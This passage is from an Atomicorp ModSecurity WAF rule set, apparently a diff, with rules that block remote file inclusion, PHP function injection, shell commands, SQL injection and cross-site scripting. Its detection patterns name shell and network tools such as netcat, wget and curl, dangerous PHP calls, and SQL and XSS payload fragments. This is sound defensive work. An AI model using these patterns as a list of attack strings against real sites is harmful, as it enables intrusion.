!ARGS:ticketmaster|!ARGS:/destination/|!ARGS:r|!ARGS:/speedtest/|!ARGS:voice|!ARGS:/tripadvisor/|!ARGS:/iTunes/|!ARGS:lang_default_value|!ARGS:weather|!ARGS:/metakey/|!ARGS:/target/|!ARGS:/password/|!ARGS:/note/|!ARGS:form_profile|!ARGS:/theme/|!ARGS:ip|!ARGS:/afbeelding/|!ARGS:/screenshot/|!ARGS:embed_code|!ARGS:/^input_/|!ARGS:/^flb/|!ARGS:gwefan|!ARGS:/xthreads/|!ARGS:flv|!ARGS:dest|!ARGS:languageChange|!ARGS:/^perch_/|!ARGS:music|!ARGS:/^p_posts/|!ARGS:input_50|!ARGS:/resolv/|!ARGS:/^install_package/|!ARGS:/address/|!ARGS:wlp|!ARGS:hp|!ARGS:refsrc|!ARGS:/censor/|!ARGS:UpdateNote|!ARGS:regx_root|!ARGS:textfetch|!ARGS:input_3|!ARGS:file|!ARGS:/avatar/|!ARGS:obj_itop|!ARGS:/feed/|!ARGS:value_string_9|!ARGS:/^cf/|!ARGS:/uri/|!ARGS:color_chart|!ARGS:ui|!ARGS:armoury|!ARGS:reverbnation|!ARGS:/return/|!ARGS:fromp|!ARGS:/site/|!ARGS:_ref|!ARGS:owa_protocol|!ARGS:/home/|!ARGS:live|!ARGS:/^func_key/|!ARGS:/trackback/|!ARGS:gmaps|!ARGS:locationhp|!ARGS:pfad|!ARGS:CUSTID|!ARGS:/img/|!ARGS:/^obj_/|!ARGS:/photo/|!ARGS:/media/|!ARGS:/icon/|!ARGS:back|!ARGS:/facebook/|!ARGS:/instagram/|!ARGS:/pinterest/|!ARGS:/linkedin/|!ARGS:/twitter/|!ARGS:/flickr/|!ARGS:/youtube/|!ARGS:parent_name|!ARGS:/blog/|!ARGS:/vid/|!ARGS:_update_failure|!ARGS:_update_success|!ARGS:hdwok|!ARGS:hdwnook|!ARGS:OpenID|!ARGS:/^hilit/|!ARGS:/reciprocal/|!ARGS:importremote|!ARGS:/callback/|!ARGS:/sponsors/|!ARGS:/^akID/|!ARGS:service|!ARGS:want2Read|!ARGS:search_string|!ARGS:/thumb/|!ARGS:/preview/|!ARGS:subject|!ARGS:direct|!ARGS:fflv|!ARGS:direct|!ARGS:source_location/|!ARGS:/^fetch/|!ARGS:/web/|!ARGS:/openid/|!ARGS:/adres/|!ARGS:/logo/|!ARGS:go|!ARGS:resolution|!ARGS:catalogue_search_code|!ARGS:/link/|!ARGS:new_channel|!ARGS:/wsdl/|!ARGS:/soap/|!ARGS:path[alias]|!ARGS:/message/|!ARGS:/^utm/|!ARGS:fighter_name|!ARGS:/^element/|!ARGS:camefrom|!ARGS:ucapi|!ARGS:clickTag1|!ARGS:rf|!ARGS:sourcetitle|!ARGS:form_pathscript|!ARGS:embeddump|!ARGS:/www/|!ARGS:/page/|!ARGS:hdwok|!ARGS:result|!ARGS:/^setting/|!ARGS:store|!ARGS:continue|!ARGS:/href/|!ARGS:dcsref|!ARGS:lec_rm|!ARGS:n-state|!ARGS:Stream|!ARGS:CP_email|!ARGS:eself|!ARGS:tax23_RefDocLoc|!ARGS:goback|!ARGS:OVRAW|!ARGS:outputfile|!ARGS:background|!ARGS:dcsref|!ARGS:path|!ARGS:ico|!ARGS:big|!ARGS:/^clickTagFrame/|!ARGS:/^attr/|!ARGS:gmu|!ARGS:entry|!ARGS:tos|!ARGS:/image/|!ARGS:user_xup|!ARGS:value_3|!ARGS:request|!ARGS:confirm|!ARGS:/^groups/|!ARGS:came_from|!ARGS:prodLogo|!ARGS:prodDownload|!ARGS:/^V_feed/|!ARGS:itemIntro|!ARGS:photo|!ARGS:/^stylevar/|!ARGS:dcsqry|!ARGS:typePageCode|!ARGS:/^GARS_existing/|!ARGS:rules|!ARGS:/^config/|!ARGS:/^revchurch/|!ARGS:goto|!ARGS:loc|!ARGS:/body/|!ARGS:/^product_long/|!ARGS:/server/|!ARGS:/content/|!ARGS:banner_top|!ARGS:banners_list|!ARGS:heading|!ARGS:packageComments|!ARGS:cl_post|!ARGS:address|!ARGS:board_msg|!ARGS:/html/|!ARGS:arg2|!ARGS:/^cf_field_/|!ARGS:msg|!ARGS:configuration_key|!ARGS:search|!ARGS:/comment/|!ARGS:enquiry|!ARGS:/desc/|!ARGS:/footer/|!ARGS:FAQTitle|!ARGS:host|!ARGS:/text/|!ARGS:whereto|!ARGS:pathToPiwik|!ARGS:email_sig|!ARGS:feed|!ARGS:/^artsee_banner_/|!ARGS:fetch|!ARGS:pingback_service|!ARGS:/hostname/|!ARGS:/http/|!ARGS:email_forward|!ARGS:bannercode|!ARGS:RTServerName|!ARGS:mesg|!ARGS:forward|!ARGS:announce_post|!ARGS:/^data/|!ARGS:/template/|!ARGS:teaser_js|!ARGS:/^item_/|!ARGS:advBannerMessage|!ARGS:thumb|!ARGS:u|!ARGS:header|!ARGS:action|!ARGS:cptpl_dir|!ARGS:Stream|!ARGS:arg6|!ARGS:dbhost|!ARGS:copyright|!ARGS:ima|!ARGS:art_summary|!ARGS:art_source|!ARGS:stretch|!ARGS:cat_sponsor|!ARGS:automode|!ARGS:myfilm1|!ARGS:/^tp_article/|!ARGS:newsettings[files_dir]|!ARGS:contactMessage|!ARGS:var_value[usps_labels_help_2]|!ARGS:short_story|!ARGS:vinculo|!ARGS:cts|!ARGS:response|!ARGS:hd_request|!ARGS:relocate|!ARGS:add_fd3|!ARGS:headers-28|!ARGS:soundname|!ARGS:bbcode_tpl|!ARGS:faqText|!ARGS:/google/|!ARGS:definition|!ARGS:tpl_cont|!ARGS:/domain/|!ARGS:searchstring|!ARGS:new_tng_path|!ARGS:babynaam|!ARGS:from_href|!ARGS:Comentario|!ARGS:/^dynadata/|!ARGS:paypal_ipn|!ARGS:title|!ARGS:right_frame|!ARGS:l1_bdy|!ARGS:theMessage|!ARGS:edit_full|!ARGS:article|!ARGS:forum|!ARGS:/^ViewState/|!ARGS:postvars|!ARGS:vars[DBhostname]|!ARGS:base1|!ARGS:cart_header|!ARGS:layout|!ARGS:GMAP_KEY|!ARGS:full_story|!ARGS:source|!ARGS:Infos|!ARGS:rev_you_tube|!ARGS:ret_address|!ARGS:GMAP_KEY|!ARGS:newsBody|!ARGS:user_sig|!ARGS:cur|!ARGS:yahoo|!ARGS:sig|!ARGS:KT_Update1|!ARGS:flds[Message]|!ARGS:EditorHTML|!ARGS:theVisibility|!ARGS:friend_M|!ARGS:before|!ARGS:sm_b_style|!ARGS:success|!ARGS:short_story|!ARGS:/^css/|!ARGS:vthumb|!ARGS:introduction|!ARGS:register_at|!ARGS:statusaddress|!ARGS:revnews_ad_120|!ARGS:/sponsor_banner/|!ARGS:newText|!ARGS:PageCopy|!ARGS:amp;loc|!ARGS:f_header|!ARGS:option[78]|!ARGS:agendWebPage|!ARGS:/ftp/|!ARGS:gen_header|!ARGS:button_dir|!ARGS:x_organizational|!ARGS:href|!ARGS:form_element3|!ARGS:answer|!ARGS:intro|!ARGS:c_msg|!ARGS:note|!ARGS:domain|!ARGS:how_did_you_hear_about_us|!ARGS:back_to|!ARGS:/sql/|!ARGS:prefix|!ARGS:clickTAG|!ARGS:problem|!ARGS:default_banner|!ARGS:archive_chrono|!ARGS:thm|!ARGS:_RW_|!ARGS:/rss/|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:outbound|!ARGS:out|!ARGS:/refer/|!ARGS:helpbox|!ARGS:basehref|!ARGS:redir|!ARGS:oaparams|!ARGS:loc|!ARGS:resource|!ARGS:wimpyApp|!ARGS:wimpySkin|!ARGS:params[altTag]|!ARGS:inc|!ARGS:fck_brief|!ARGS:resource_box|!ARGS:areaContent2|!ARGS:ref|!ARGS:Post|!ARGS:reply|!ARGS:last_msg|!ARGS:tresc|!ARGS:pay_list_type|!ARGS:FULL_URL|!ARGS:HOMEPAGE_URL|!ARGS:ATTACHMENTS_URL|!ARGS:stories_cat|!ARGS:sUrl|!ARGS:view|!ARGS:howhear|!ARGS:oldmsg|!ARGS:/^FCKeditor/|!ARGS:excerpt|!ARGS:saved_data|!ARGS:signature|!ARGS:disc|!ARGS:utmr|!ARGS:user[signature]|!ARGS:Query|!ARGS:steps|!ARGS:bbcode_replace|!ARGS:jumpTo|!ARGS:memo|!ARGS:flvSource|!ARGS:_docSelector|!ARGS:goto|!ARGS:from|!ARGS:footer|!ARGS:cmstr|!ARGS:remotefile|!ARGS:location|!ARGS:dest|!ARGS:Dialog30|!ARGS:Dialog7|!ARGS:configParams[api][configParamValue]|!ARGS:/^wimpy/|!ARGS:fb_ref|!ARGS:notes|!ARGS:pn_domain|!ARGS:newidentities[0][signature]|!ARGS:addendum|!ARGS:utmp|!ARGS:whydowork_code|!ARGS:value_190|!ARGS:/ajax/|!ARGS:backto|!ARGS:/^rsargs/|!ARGS:op|!ARGS:ret|!ARGS:Store_CustomerEmail_Header|!ARGS:old_file[]|!ARGS:zajawka|!ARGS:summary|!ARGS:input_name[4]|!ARGS:input_name[0]|!ARGS:area|!ARGS:Brief_Profile|!ARGS:summary|!ARGS:data|!ARGS:st_widget|!ARGS:ban_reason|!ARGS:def|!ARGS:data[Email][comment]|!ARGS:playlist|!ARGS:enlace|!ARGS:data_codepress|!ARGS:Store_OUI_GlobalFooter|!ARGS:map|!ARGS:dynafield[_SIGNATURE]|!ARGS:payment_extrainfo|!ARGS:wysiwyg|!ARGS:banner|!ARGS:env_ping_list|!ARGS:subdir[0]|!ARGS:x_Instructions|!ARGS:f_license|!ARGS:env_ping_list|!ARGS:xsponsor2|!ARGS:code|!ARGS:/^k2extra/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"   "chain,t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+SecRule MATCHED_VARS "!@rx ://%{SERVER_NAME}/" "t:none,t:urlDecodeUni,t:lowercase"
+SecRule ARGS|!ARGS:/jform/|!ARGS:/code/|!ARGS:/^element/|!ARGS:/script/|!ARGS:data[mail][preload]|!ARGS:/text/|!ARGS:custom_script "(?:chr|f(?:write|open)|system|echr|passthru|serialize|php_uname|include|popen|shell_exec|mysql_query|exec|eval|create_function|proc_\w+|pfsockopen|leak|apache_child_terminate|posix_\w+|phpinfo|preg_\w+) ?\( ?'?"         "deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:lowercase,capture,chain,id:387123,phase:2,rev:6,severity:2,msg:'Atomicorp.com WAF Rules: Generic php body attack attempt',logdata:'%{TX.0}'"
+SecRule ARGS|!ARGS:content|!ARGS:/jform/|!ARGS:/text/|!ARGS:/script/ "(?:(?:cd|mkdir)[[:space:]]+(?:/|[a-z|0-9]|\.)|perl |killall |python |rpm |yum |apt-get |emerge |lynx |links |mkdir |elinks |cmd|pwd|(?:w|ftp)get |lwp-(?:download|request|mirror|rget) |uname |cvs |svn |(?:s|r)(?:cp|sh) |net(?:stat|cat)|rexec |smbclient |t?ftp |ncftp |chmod |curl |telnet |gcc |cc |g\+\+ |whoami|\./|killall |rm \-[a-z])"
+
+SecRule REQUEST_URI|REQUEST_HEADERS|!REQUEST_HEADERS:Referer|!REQUEST_HEADERS:Cookie|REQUEST_COOKIES|REQUEST_COOKIES_NAMES|!REQUEST_COOKIES_NAMES:/utm/|!REQUEST_COOKIES_NAMES:/_pk_ref/|!REQUEST_COOKIES:/utm/|!REQUEST_COOKIES:/_pk_ref/|ARGS|XML:/*|!ARGS:/script/|!ARGS:/custom_template/|!ARGS:/^elements/|!ARGS:default|!ARGS:/php/|!ARGS:piece3code|!ARGS:/^jform/|!ARGS:/query/|!ARGS:/comment/|!ARGS:keywords|!ARGS:/description/|!ARGS:/sql/|!ARGS:prefix|!ARGS:query|!ARGS:/desc/|!ARGS:movie_brief|!ARGS:/text/|!ARGS:/message/|!ARGS:ncontent|!ARGS:/body/|!ARGS:/content/|!ARGS:searchword|!ARGS:add_keywords|!ARGS:/description/|!ARGS:/products_description/|!ARGS:contactMessage|!ARGS:cts|!ARGS:meta_descr|!ARGS:edited|!ARGS:content|!ARGS:description|!ARGS:Post|!ARGS:body|!ARGS:ll_content_message|!ARGS:page-content|!ARGS:reply|!ARGS:xml|!ARGS:content_en|!ARGS:filecontent|!ARGS:message|!ARGS:content_en|!ARGS:general[description]|!ARGS:response[14]|!ARGS:/article/ "(?:(?:select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[a-z|0-9|\*|\,]+[[:space:]]+(?:from|into|table|database|index|view)[[:space:]]+[a-z|0-9|\*| |\,]|\bunion\b.{1,100}?\bselect\b.*[a-z0-9].*from|select (?:load_file|char\()|(?:insert|remark)test;)" 	"deny,log,auditlog,status:403,phase:2,capture,t:none,t:urlDecodeUni,t:lowercase,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,id:350096,rev:5,severity:2,msg:'Atomicorp.com WAF Rules: Generic SQL injection protection',logdata:'%{TX.0}',chain"
+SecRule REQUEST_URI "!(^/administrator/index\.php\?option=com_rsform)"
+
+SecRule REQUEST_HEADERS|!REQUEST_HEADERS:Referer|!REQUEST_HEADERS:Cookie|REQUEST_COOKIES|REQUEST_COOKIES_NAMES|!REQUEST_COOKIES_NAMES:/utm/|!REQUEST_COOKIES_NAMES:/_pk_ref/|!REQUEST_COOKIES:/utm/|!REQUEST_COOKIES:/_pk_ref/|ARGS|!ARGS:ncontent|!ARGS:/php/|!ARGS:/script/|!ARGS:/custom_template/|!ARGS:/^elements/|!ARGS:/body/|!ARGS:/content/|!ARGS:/query/|!ARGS:/^jform/|!ARGS:searchword|!ARGS:add_keywords|!ARGS:comment|!ARGS:comments|!ARGS:text|!ARGS:/description/|!ARGS:/sql/|!ARGS:prefix|!ARGS:query|!ARGS:contactMessage|!ARGS:cts|!ARGS:meta_descr|!ARGS:text|!ARGS:edited|!ARGS:content|!ARGS:introtext|!ARGS:Post|!ARGS:itembigtext|!ARGS:/article/|!ARGS:body|!ARGS:mytextarea|!ARGS:ll_content_message|!ARGS:page-content|!ARGS:reply|!ARGS:xml|!ARGS:content_en|!ARGS:filecontent|!ARGS:message|!ARGS:content_en|!ARGS:general[description]|!ARGS:response[14]|!ARGS:article|!ARGS:wptextbox1 "(?:insert into values|select from [a-z|0-9]!( and)|bulk insert |union select|union all select|convert \(.*from|select (?:load_file|char\()|(?:insert|remark)test;)"  	"deny,log,auditlog,status:403,phase:2,capture,t:none,t:replaceComments,t:compressWhiteSpace,id:350097,rev:47,severity:2,msg:'Atomicorp.com WAF Rules: Generic SQL injection protection in ARGS',logdata:'%{TX.0}'"
+
+# Rule 340095: generic sig for more bad PHP functions
+SecRule ARGS|!ARGS:/keywords/|!ARGS:/script/|!ARGS:/content/|!ARGS:product_desc|!ARGS:editor_body|!ARGS:/mail/|!ARGS:/^jform/|!ARGS:/longdesc/|!ARGS:/^layout/|!ARGS:/quote/|!ARGS:/^element/|!ARGS:message|!ARGS:/description/|!ARGS:/text/|!ARGS:/txt/|!ARGS:email "(?:\(chr ?\([0-9]{1,3}\)|= ?f(?:open|write) ?\(|\b(?:passthru|php_uname|phpinfo|preg_\w+|shell_exec|exec|system) ?(?:\( ?(?:'|\")|@|\: ?')\b)" 	"t:none,t:urlDecodeUni,t:compressWhitespace,t:lowercase,deny,log,auditlog,status:403,phase:2,capture,id:350095,rev:12,severity:2,msg:'Atomicorp.com WAF Rules: Attack Blocked -  PHP attack in Argument',logdata:'%{TX.0}'"
+# Rule 340149:  XSS injection
+SecRule REQUEST_URI "!(/administrator/index\.php\?option=com_(?:rsform|modules|sobipro|nbill|plugins|employment|aclassif|redshop|cckjseblod|templates))" 	"chain,deny,log,auditlog,status:403,phase:2,t:none,t:removeNulls,t:lowercase,t:compressWhitespace,capture,id:310716,rev:34,severity:2,msg:'Atomicorp.com WAF Rules: Cross Site Scripting Attack',logdata:'%{TX.0}'"
+SecRule ARGS|!ARGS:/script/|!ARGS:/^lang\[/|!ARGS:/premiere/|!ARGS:metakey|!ARGS:tcode|!ARGS:/accolade/|!ARGS:/product_/|!ARGS:/insertstring/|!ARGS:thecode|!ARGS:/^vertex/|!ARGS:tz_media_code|!ARGS:slider|!ARGS:/dialogue/|!ARGS:answer|!ARGS:location|!ARGS:fieldstyle|!ARGS:/confirmation/|!ARGS:/limitpage/|!ARGS:/button/|!ARGS:thirdparty|!ARGS:/synopsis/|!ARGS:/question/|!ARGS:/custom/|!ARGS:/profile/|!ARGS:addr|!ARGS:fulladdress|!ARGS:msc.restrict|!ARGS:/instrumentation/|!ARGS:/disallow/|!ARGS:php_out|!ARGS:rs_specs|!ARGS:dloadexp|!ARGS:passwd|!ARGS:/leftcol/|!ARGS:/rightcol/|!ARGS:/projects/|!ARGS:/discography/|!ARGS:/^button/|!ARGS:/remark/|!ARGS:order_sign|!ARGS:/^breves/|!ARGS:/^zcck/|!ARGS:/specification/|!ARGS:/^tpl_/|!ARGS:/biog/|!ARGS:/^attr/|!ARGS:/custfoot/|!ARGS:/custhead/|!ARGS:/display/|!ARGS:/sml_/|!ARGS:/^ctl_next/|!ARGS:/print/|!ARGS:/quote/|!ARGS:/instructions/|!ARGS:/priceFormat/|!ARGS:overview|!ARGS:js|!ARGS:/^arg/|!ARGS:/^rsmailConfig/|!ARGS:deal_coupon|!ARGS:/review/|!ARGS:/^cb_/|!ARGS:/^extraf/|!ARGS:/send/|!ARGS:/enquire/|!ARGS:/accesoires/|!ARGS:tip|!ARGS:/^dms/|!ARGS:/^cf/|!ARGS:/testimonial/|!ARGS:/server/|!ARGS:/sherpa/|!ARGS:/feature/|!ARGS:/^tips/|!ARGS:/thank/|!ARGS:/term/|!ARGS:/script/|!ARGS:/filter/|!ARGS:/^jform/|!ARGS:/booking/|!ARGS:ad_code|!ARGS:output|!ARGS:ll|!ARGS:/chronofield/|!ARGS:/config/|!ARGS:/^option_value/|!ARGS:parent_path|!ARGS:/popup/|!ARGS:/footer/|!ARGS:Right_photo_1|!ARGS:code|!ARGS:/^K2ExtraField/|!ARGS:/submitcode/|!ARGS:misc|!ARGS:/layout/|!ARGS:/^form/|!ARGS:payment_extrainfo|!ARGS:/^xjxargs/|!ARGS:/param/|!ARGS:oid|!ARGS:value|!ARGS:/video/|!ARGS:embedVideo|!ARGS:/vendor_/|!ARGS:beschrijving|!ARGS:custombannercode|!ARGS:bannercode|!ARGS:privatecapacity|!ARGS:diz|!ARGS:FormLayout|!ARGS:parent_name|!ARGS:/^fck/|!ARGS:/^code_tscript/|!ARGS:_qf_Group_next|!ARGS:project_company|!ARGS:mes|!ARGS:signature|!ARGS:quote-form|!ARGS:paepdc|!ARGS:/VB_announce/|!ARGS:/^autoDS/|!ARGS:newyddionc|!ARGS:/serendipity/|!ARGS:omschrijving|!ARGS:resolution|!ARGS:bericht|!ARGS:property_copy|!ARGS:/^outpay/|!ARGS:s_query|!ARGS:bedrijfsprofiel|!ARGS:finish_survey|!ARGS:embeddump|!ARGS:photolater|!ARGS:/element/|!ARGS:ticket_response|!ARGS:option[vbpclosedreason]|!ARGS:/intro/|!ARGS:/contenido/|!ARGS:/tekst/|!ARGS:/sql/|!ARGS:prefix|!ARGS:query|!ARGS:c_features|!ARGS:other_clubs|!ARGS:/^elm/|!ARGS:/^saes/|!ARGS:verbiage|!ARGS:dlv_instructions!ARGS:/^cymr/|!ARGS:_qf_Register_upload|!ARGS:/^wz/|!ARGS:tiny_vals|!ARGS:sSave|!ARGS:/article/|!ARGS:/about/|!ARGS:/^elm/|!ARGS:news|!ARGS:/Summarize/|!ARGS:usr1|!ARGS:resolution|!ARGS:problem|!ARGS:/^product_options/|!ARGS:/field_unit/|!ARGS:eintrag|!ARGS:/edit/|!ARGS:/SiteStructure/|!ARGS:/anmerkung/|!ARGS:/summary/|!ARGS:Returnid|!ARGS:reply|!ARGS:/story/|!ARGS:resource_box|!ARGS:order|!ARGS:youtube|!ARGS:business|!ARGS:/homePage/|!ARGS:/post/|!ARGS:navig|!ARGS:/page/|!ARGS:area|!ARGS:/^field_id/|!ARGS:/detail/|!ARGS:/comment/|!ARGS:LongDesc|!ARGS:meta_info|!ARGS:ta|!ARGS:/data/|!ARGS:/theme/|ARGS_NAMES|!ARGS_NAMES:user[click_or_onmouseover]|!ARGS_NAMES:/^jform/|!ARGS:busymess|!ARGS_NAMES:/^V\*/|!ARGS_NAMES:/^S\*/|!ARGS:/^quickrise_advertise/|!ARGS:rt_xformat|!ARGS:/wysiwyg/|!ARGS:contingut|!ARGS:/^werg/|!ARGS:/body/|!ARGS:/css/|!ARGS:user[usertitle]|!ARGS:/^section/|!ARGS:/msg/|!ARGS:/notice/|!ARGS:/email/|!ARGS:t_cont|!ARGS:/note/|!ARGS:/xml/|!ARGS:/^doc/|!ARGS:/desc/|!ARGS:tekst|!ARGS:invoice_snapshot|!ARGS:/code/|!ARGS:/submit/|!ARGS:/message/|!ARGS:/html/|!ARGS:/content/|!ARGS:/link/|!ARGS:/text/|!ARGS:/txt/|!ARGS:/refer/|!ARGS:/referrer/|!ARGS:/template/|!ARGS:/ajax/|!ARGS:/pagecode/|!ARGS:parent_path|!ARGS:/header/|!ARGS:/footer/|!ARGS:awards|!ARGS:/canceledpage/|!ARGS:/email/  "(< ?(?:(?:img|i?frame) ?src|a ?href) ?= ?(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/|(?:\.add|\@)import|asfunction\:|background-image\:|\be(?:cma|xec)script\b|\.fromcharcode|get(?:parentfolder|specialfolder)|\.innerhtml|(?:java|live|j|vb)script!s|lowsrc|mocha\:|!(i|t)on(?:abort|blur|change|click!s|dragdrop|event|focus|keydown|keypress|keyup)|onmouse(?:down|move|out|over|up)|shell\:|window\.location|asfunction:_root\.launch|\%env)" "t:none,t:urlDecodeUni,t:replaceComments,t:compressWhiteSpace,t:replaceNulls,t:htmlEntityDecode,t:lowercase,t:compressWhitespace"
+
+# Rule 340148:  XSS injection with multimatch checks
+SecRule REQUEST_URI "!(/administrator/index\.php\?(?:option=com_(?:rsform|sobipro|modules|nbill|employment|aclassif|redshop|cckjseblod|templates)|format=html))"           "chain,deny,log,auditlog,status:403,phase:2,t:none,t:removeNulls,t:lowercase,capture,id:310717,rev:215,severity:2,msg:'Atomicorp.com WAF Rules: Cross Site Scripting Attack',logdata:'%{TX.0}'"
+SecRule ARGS|!ARGS:/script/|!ARGS:piece2code|ARGS_NAMES|!ARGS:/^lang\[/|!ARGS:/^trucs/|!ARGS:/accolade/|!ARGS:/adwords/|!ARGS:/product_/|!ARGS:metakey|!ARGS:/insertstring/|!ARGS:tcode|!ARGS:thecode|!ARGS:/^vertex/|!ARGS:tz_media_code|!ARGS:/dialogue/|!ARGS:slider|!ARGS:location|!ARGS:/format/|!ARGS:answer|!ARGS:/confirmation/|!ARGS:fieldstyle|!ARGS:/premiere/|!ARGS:/performances/|!ARGS:values|!ARGS:media|!ARGS:/synopsis/|!ARGS:/button/|!ARGS:thirdparty|!ARGS:/question/|!ARGS:/limitpage/|!ARGS:/disallow/|!ARGS:addr|!ARGS:fulladdress|!ARGS:/instrumentation/|!ARGS:msc.restrict|!ARGS:/profile/|!ARGS:passwd|!ARGS:rs_specs|!ARGS:dloadexp|!ARGS:/suffix/|!ARGS:/leftcol/|!ARGS:/rightcol/|!ARGS:title|!ARGS:php_out|!ARGS:/projects/|!ARGS:/discography/|!ARGS:order_sign|!ARGS:/remark/|!ARGS:/^button/|!ARGS:/^breves/|!ARGS:/^zcck/|!ARGS:/custom/|!ARGS:/sml_/|!ARGS:/^tpl_/|!ARGS:/biog/|!ARGS:/^attr/|!ARGS:/custhead/|!ARGS:/custfoot/|!ARGS:/display/|!ARGS:/userlist/|!ARGS:/print/|!ARGS:/^ctl_next/|!ARGS:/quote/|!ARGS:/instructions/|!ARGS:/specification/|!ARGS:overview|!ARGS:/^arg/|!ARGS:js|!ARGS:deal_coupon|!ARGS:/^rsmailConfig/|!ARGS:/review/|!ARGS:/^extraf/|!ARGS:/^cb_/|!ARGS:/enquire/|!ARGS:/send/|!ARGS:/^dms/|!ARGS:/accesoires/|!ARGS:tip|!ARGS:/^cf/|!ARGS:/testimonial/|!ARGS:/navigation/|!ARGS:/server/|!ARGS:/feature/|!ARGS:/sherpa/|!ARGS:id|!ARGS:/term/|!ARGS:/thank/|!ARGS:/script/|!ARGS:/booking/|!ARGS:/^jform/|!ARGS:ad_code|!ARGS:/msg/|!ARGS:/notice/|!ARGS:/email/|!ARGS:/priceFormat/|!ARGS:/caption/|!ARGS:/^tips/|!ARGS:/chronofield/|!ARGS:/config/|!ARGS:output|!ARGS:parent_path|!ARGS:/popup/|!ARGS:ll|!ARGS:/^option_value/|!ARGS:sidebar|!ARGS:code|!ARGS:Right_photo_1|!ARGS:/^K2ExtraField/|!ARGS:/info/|!ARGS:misc|!ARGS:thanksemail|!ARGS:sml_prt_1|!ARGS:pay_inst_1|!ARGS:/^form/|!ARGS:/layout/|!ARGS:/^xjxargs/|!ARGS:payment_extrainfo|!ARGS:/param/|!ARGS:/^language_strings/|!ARGS:misc|!ARGS:oid|!ARGS:layout|!ARGS:prefix|!ARGS:value|!ARGS:default_value|!ARGS:/video/|!ARGS:/submitcode/|!ARGS:beschrijving|!ARGS:custombannercode|!ARGS:bannercode|!ARGS:privatecapacity|!ARGS:diz|!ARGS:FormLayout|!ARGS:parent_name|!ARGS:/^fck/|!ARGS:/^code_tscript/|!ARGS:_qf_Group_next|!ARGS:project_company|!ARGS:categories_title|!ARGS:antwoord|!ARGS:project_company|!ARGS:signature|!ARGS:paepdc|!ARGS:tpl_source|!ARGS:teaser_js|!ARGS:/^autoDS/|!ARGS:FrmSide|!ARGS:mainKeywords|!ARGS:guardar|!ARGS:/VB_announce/|!ARGS:/serendipity/|!ARGS:omschrijving|!ARGS:resolution|!ARGS:newyddionc|!ARGS:bericht|!ARGS:property_copy|!ARGS:/^outpay/|!ARGS:bedrijfsprofiel|!ARGS:s_query|!ARGS:finish_survey|!ARGS:photolater|!ARGS:/element/|!ARGS:ticket_response|!ARGS:option[vbpclosedreason]|!ARGS:embeddump|!ARGS:/embedVideo/|!ARGS:/intro/|!ARGS:/contenido/|!ARGS:query|!ARGS:/sql/|!ARGS:prefix|!ARGS:/tekst/|!ARGS:/field_unit/|!ARGS:other_clubs|!ARGS:/^elm/|!ARGS:/^saes/|!ARGS:dlv_instructions!ARGS:/^cymr/|!ARGS:_qf_Register_upload|!ARGS:verbiage|!ARGS:/^wz/|!ARGS:tiny_vals|!ARGS:sSave|!ARGS:/article/|!ARGS:/about/|!ARGS:/^elm/|!ARGS:news|!ARGS:/Summarize/|!ARGS:/^product_options/|!ARGS:/SiteStructure/|!ARGS:/anmerkung/|!ARGS:/summary/|!ARGS:/edit/|!ARGS:reply|!ARGS:/story/|!ARGS:resource_box|!ARGS:order|!ARGS:youtube|!ARGS:/post/|!ARGS:reply|!ARGS:business|!ARGS:navig|!ARGS:pagimenu_inhoud|!ARGS:/note/|!ARGS:/page/|!ARGS:/homePage/|!ARGS:Post|!ARGS:area|!ARGS:/^field_id/|!ARGS:/detail/|!ARGS:/comment/|!ARGS:/duties/|!ARGS:/desc/|!ARGS:ta|!ARGS:/data/|!ARGS:Returnid|!ARGS:busymess|!ARGS_NAMES:/^V\*/|!ARGS_NAMES:/^S\*/|!ARGS:/^quickrise_advertise/|!ARGS:rt_xformat|!ARGS:/wysiwyg/|!ARGS:contingut|!ARGS:/^werg/|!ARGS:/body/|!ARGS:/css/|!ARGS:/^section/|!ARGS:/msg/|!ARGS:t_cont|!ARGS:/^doc/|!ARGS:/xml/|!ARGS:googlemap|!ARGS:tekst|!ARGS:formsubmit|!ARGS:parent_path|!ARGS:invoice_snapshot|!ARGS:submit|!ARGS:/message/|!ARGS:/html/|!ARGS:/content/|!ARGS:/pagecode/|!ARGS:/footer/|!ARGS:/header/|!ARGS:/link/|!ARGS:/text/|!ARGS:/txt/|!ARGS:/refer/|!ARGS:/referrer/|!ARGS:/template/|!ARGS:awards|!ARGS:/ajax/  "(?:< ?script|(?:<|< ?/)(?:(?:java|vb)script|about|applet|activex|chrome)|\%env|< ?i?frame ?src ?= ?(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/|(?:\.add|\@)import |asfunction\:|background-image\:|e(?:cma|xec)script|\.fromcharcode|get(?:parentfolder|specialfolder)|\.innerhtml|\< ?input|(?:/|<) ?(?:java|live|j|vb)script!s|lowsrc ?=|mocha\:|\bon(?:abort|blur|change|click|submit|select|dragdrop|event|focus|key(?:down|press|up)|mouse(?:down|move|out|over|up))\b ?=|shell\:|window\.location|asfunction:_root\.launch)" "t:none,t:urlDecodeUni,t:replaceComments,t:compressWhiteSpace,t:replaceNulls,t:htmlEntityDecode,t:lowercase,multimatch"
+# Rule 340147: Generic XSS filter
+SecRule REQUEST_URI "!(/administrator/index\.php\?option=com_(?:rsform|sobipro|nbill|modules|employment|aclassif|redshop|cckjseblod|templates))"          "chain,deny,log,auditlog,status:403,phase:2,t:none,t:lowercase,capture,id:310718,rev:41,severity:2,msg:'Atomicorp.com WAF Rules: Generic XSS filter',logdata:'%{TX.0}'"
